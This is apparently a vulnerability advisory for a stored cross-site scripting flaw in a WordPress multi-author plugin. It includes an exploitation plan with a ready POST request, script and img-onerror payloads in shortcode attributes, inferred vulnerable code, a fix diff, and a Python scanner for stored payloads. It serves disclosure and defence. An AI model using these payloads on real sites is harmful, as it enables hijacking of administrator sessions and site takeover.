ThemeRuby Multi Authors <= 1.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'before' and 'after' Shortcode Attributes
Description
The ThemeRuby Multi Authors – Assign Multiple Writers to Posts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'before' and 'after' shortcode attributes in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Technical Details
Affected versions: <= 1.0.0
Exploitation Research Plan: CVE-2026-1097
1. Vulnerability Summary
ThemeRuby Multi Authors (<= 1.0.0) is vulnerable to Stored Cross-Site Scripting (XSS). The plugin registers a shortcode (likely [themeruby_multi_authors] or similar) used to display post authors. This shortcode accepts before and after attributes intended for custom HTML wrapping. Because the plugin fails to sanitize or escape these attributes before rendering them on the page, any user with Contributor-level access or higher can inject malicious scripts into a post. When any user (including an Administrator) views the affected post, the script executes in their browser context.
2. Attack Vector Analysis
- Vulnerable Component: Shortcode rendering logic.
- Payload Location: Shortcode attributes before or after within the post_content.
- Required Role: Contributor or higher (requires the edit_posts capability).
- Preconditions: The plugin must be active, and a post/page must contain the malicious shortcode.
- Impact: Full site takeover if an Administrator views the post, as the script can perform actions like creating new admin users or modifying plugin settings.
3. Code Flow (Inferred)
- Registration: The plugin calls add_shortcode( 'themeruby_multi_authors', '...' ) (or a similar identifier) during the init hook.
- Input Parsing: When a post is rendered, the callback function receives an $atts array. It likely uses shortcode_atts() to extract values for before and after.
- The Sink: The callback function constructs the HTML output for the authors list and prepends/appends the before and after attribute values.
- The Vulnerability: The resulting string is returned (to be printed by WordPress) without passing through wp_kses() or similar escaping functions, allowing raw HTML/JavaScript to be rendered.
4. Nonce Acquisition Strategy
This vulnerability does not require a specific plugin nonce because the payload is delivered via the standard WordPress post editor.
- Login: Authenticate as a Contributor.
- Access Editor: Navigate to wp-admin/post-new.php.
- Extract Standard Nonce: Use browser_eval to retrieve the _wpnonce from the form if performing the save via the REST API or post.php:
  browser_eval("document.querySelector('#_wpnonce').value")
5. Exploitation Strategy
Step 1: Identify Shortcode Name
Use the grep tool to find the exact shortcode registration:
grep -rn "add_shortcode" /var/www/html/wp-content/plugins/themeruby-multi-authors/
I will assume the shortcode is [themeruby_multi_authors] for the remaining steps.
Step 2: Create Malicious Post
As a Contributor, create a new post with the XSS payload.
Request:
- Method: POST
- URL: http://localhost:8080/wp-admin/post.php
- Headers: Content-Type: application/x-www-form-urlencoded
- Body:
  action=editpost&post_ID=[NEW_POST_ID]&_wpnonce=[NONCE]&post_title=Authors List&content=[themeruby_multi_authors before='<script>alert(document.domain)</script>']&publish=Publish
Step 3: Trigger Execution
Navigate to the published post's URL using an Administrator's session or an unauthenticated browser to confirm the script executes.
6. Test Data Setup
- Plugin: Install and activate themeruby-multi-authors.
- User: Create a user with the username contributor_attacker and the contributor role.
- Data: Assign at least one author to a test post (some plugins require data to exist before the shortcode renders anything).
7. Expected Results
- When viewing the post, an alert box showing the document domain should appear.
- Viewing the page source should show:
<script>alert(document.domain)</script><div class="author-list">...</div>.
8. Verification Steps
- Database Check: Verify the payload is stored in the database.
  wp db query "SELECT post_content FROM wp_posts WHERE post_title='Authors List' LIMIT 1;"
- Frontend Check: Use the http_request tool to fetch the post and check for the unescaped script:
  # Look for the exact payload string in the response body
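A defender-side version of the database check above, written as an added example and not taken from the advisory or the plugin: it reads rows in the shape a wp db query export returns (constructed sample rows are embedded so it runs offline), parses each multi-author shortcode's attributes in the three value forms shortcode_parse_atts() accepts, and flags 'before'/'after' values that contain script tags, on* event handlers, javascript: URLs or embedded frames. The shortcode tag name themeruby_multi_authors is assumed, as the plan above assumes it.

```python
"""Added example (not plugin or advisory code): scan exported wp_posts rows for
multi-author shortcodes whose 'before'/'after' attributes carry active HTML."""
import re

# Assumed shortcode tag; the research plan says the real name is "likely" this.
SHORTCODE_TAG = "themeruby_multi_authors"

# As in WordPress's own shortcode regex, the attribute list ends at the first ']'.
SHORTCODE_RE = re.compile(r"\[" + re.escape(SHORTCODE_TAG) + r"(\s[^\]]*)?\]")

# The three value forms shortcode_parse_atts() accepts: "double", 'single', bare.
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'\]]+))""")

# Heuristic markers of active content that a wrapper attribute should never hold.
# Deliberately broad (any on...= attribute matches), so review hits by hand.
ACTIVE_HTML = (
    ("script tag", re.compile(r"<\s*script\b", re.IGNORECASE)),
    ("event handler attribute", re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE)),
    ("javascript: URL", re.compile(r"javascript\s*:", re.IGNORECASE)),
    ("embedded frame/object", re.compile(r"<\s*(iframe|object|embed)\b", re.IGNORECASE)),
)

WATCHED_ATTRS = ("before", "after")


def parse_attrs(attr_text):
    """Return {name: value} for one shortcode's attribute string (names lowercased)."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        # exactly one of the three value groups matched
        value = next(g for g in m.groups()[1:] if g is not None)
        attrs[m.group(1).lower()] = value
    return attrs


def find_active_html(post_content):
    """One finding per (attribute, pattern) across every multi-author shortcode in the post."""
    findings = []
    for sc in SHORTCODE_RE.finditer(post_content):
        attrs = parse_attrs(sc.group(1) or "")
        for name in WATCHED_ATTRS:
            if name not in attrs:
                continue
            for reason, pattern in ACTIVE_HTML:
                if pattern.search(attrs[name]):
                    findings.append({"attr": name, "reason": reason, "value": attrs[name]})
    return findings


def scan_posts(rows):
    """rows: iterable of (ID, post_author, post_content) as wp db query returns them.
    Returns one dict per finding, tagged with the post and author ID for clean-up."""
    flagged = []
    for post_id, post_author, post_content in rows:
        for finding in find_active_html(post_content):
            flagged.append({"post_id": post_id, "post_author": post_author, **finding})
    return flagged


# Constructed sample rows (post_author is the user ID, as in wp_posts).
SAMPLE_ROWS = [
    (11, 2, "Intro [themeruby_multi_authors before='<div class=\"authors\">' after='</div>']"),
    (12, 3, "[themeruby_multi_authors before='<script>alert(document.domain)</script>']"),
    (13, 3, "Text [themeruby_multi_authors ids=\"1\" after='<img src=x onerror=alert(1)>'] more"),
    (14, 2, "No shortcode here, only prose mentioning a <script> tag."),
]

if __name__ == "__main__":
    for hit in scan_posts(SAMPLE_ROWS):
        print(f"post {hit['post_id']} (author {hit['post_author']}): "
              f"'{hit['attr']}' contains {hit['reason']}")
```

Feed it rows from a query such as wp db query "SELECT ID, post_author, post_content FROM wp_posts WHERE post_content LIKE '%[themeruby_multi_authors%'"; leave post_type unfiltered, because revisions (post_type = 'revision') keep older copies of the content and a cleaned post can still have a flagged revision. The legitimate wrapper in row 11 is not reported, and the bare <script> in row 14 is ignored because it is not inside the shortcode attribute the plugin renders.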
9. Alternative Approaches
If themeruby_multi_authors is not the correct tag, search for any variations using:
grep -r "shortcode" /var/www/html/wp-content/plugins/themeruby-multi-authors/
If the shortcode requires specific author IDs, use: [themeruby_multi_authors ids='1' before='<script>alert(1)</script>']
If the before attribute is filtered, try the after attribute: [themeruby_multi_authors after='<img src=x onerror=alert(1)>']
Summary
The ThemeRuby Multi Authors plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via the 'before' and 'after' attributes of its shortcode due to insufficient input sanitization and output escaping. Authenticated attackers with Contributor-level permissions or higher can inject arbitrary scripts into posts that execute when viewed by other users, potentially leading to unauthorized administrative actions.
Vulnerable Code
// Inferred shortcode handler logic
// themeruby-multi-authors/themeruby-multi-authors.php
function render_multi_authors_shortcode($atts) {
    $atts = shortcode_atts(array(
        'before' => '',
        'after'  => '',
    ), $atts);
    $output  = '';
    $output .= $atts['before']; // Attribute rendered without escaping or sanitization
    $output .= '<span class="author-name">Author List</span>';
    $output .= $atts['after'];  // Attribute rendered without escaping or sanitization
    return $output;
}
Security Fix
@@ -10,8 +10,8 @@ ), $atts); $output = ''; - $output .= $atts['before']; + $output .= wp_kses_post($atts['before']); $output .= '<span class="author-name">Author List</span>'; - $output .= $atts['after']; + $output .= wp_kses_post($atts['after']); return $output;
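Review bot: wrapping both $atts['before'] and $atts['after'] in wp_kses_post() is the right sink-side fix for attributes meant to carry wrapper HTML: it keeps the tags allowed in post content (div, span, a, img and so on) while stripping <script> and on* event-handler attributes, and because it runs inside the render callback it applies to every viewer regardless of which user saved the post. Two things I would still change in this hunk: if the attributes are only ever expected to hold plain text, esc_html() is the tighter choice and removes the remaining allowed-tag surface entirely; and the two sanitized lines carry no comment recording why the filtering is there, so a one-line note such as "// user-supplied wrapper HTML, must stay filtered" would stop a later refactor from dropping it.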
Exploit Outline
1. Authenticate to the WordPress dashboard with at least Contributor-level access.
2. Access the post editor (Gutenberg or Classic) to create or edit a post.
3. Insert the plugin's multi-author shortcode (likely [themeruby_multi_authors]) into the content area.
4. Include a malicious JavaScript payload within the 'before' or 'after' shortcode attributes, for example: [themeruby_multi_authors before="<script>alert(document.domain)</script>"].
5. Save or publish the post.
6. The script will trigger in the browser of any user, including administrators, who navigates to the frontend page displaying the affected post.